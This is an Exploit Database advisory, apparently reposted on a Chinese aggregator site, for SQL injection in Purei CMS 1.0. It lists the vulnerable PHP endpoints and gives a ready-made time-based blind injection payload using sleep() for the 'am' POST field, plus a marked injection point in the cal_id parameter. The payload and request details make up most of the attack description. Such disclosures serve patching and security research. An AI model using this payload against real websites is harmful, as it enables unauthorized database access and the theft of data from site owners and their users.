Purei CMS 1.0 – SQL Injection

• Exploit Database
• 64 阅读

• 作者： Number 7
  日期： 2024-03-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51929/

• # Exploit Title: Purei CMS 1.0 - SQL Injection
  # Date: [27-03-2024]
  # Exploit Author: [Number 7]
  # Vendor Homepage: [purei.com]
  # Version: [1.0]
  # Tested on: [Linux]
  ____________________________________________________________________________________
  
  Introduction:
  An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation 
  of user input. Such an injection transpires when web applications accept user input directly inserted 
  into an SQL statement without effectively filtering out hazardous characters.
  
  This could jeopardize the integrity of your database or reveal sensitive information.
  ____________________________________________________________________________________
  
  Time-Based Blind SQL Injection:
  Vulnerable files:
  http://localhost/includes/getAllParks.php
  http://localhost/includes/getSearchMap.php
  
  make a POST request with the value of the am input set to :
  
  	if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ 
  
  make sure to url encode the inputs.	
  SQL injection:
  Method: POST REQUEST
  
  Vunerable file:
  
  /includes/events-ajax.php?action=getMonth
  data for the POST req:
  month=3&type=&year=2024&cal_id=1[Inject Here]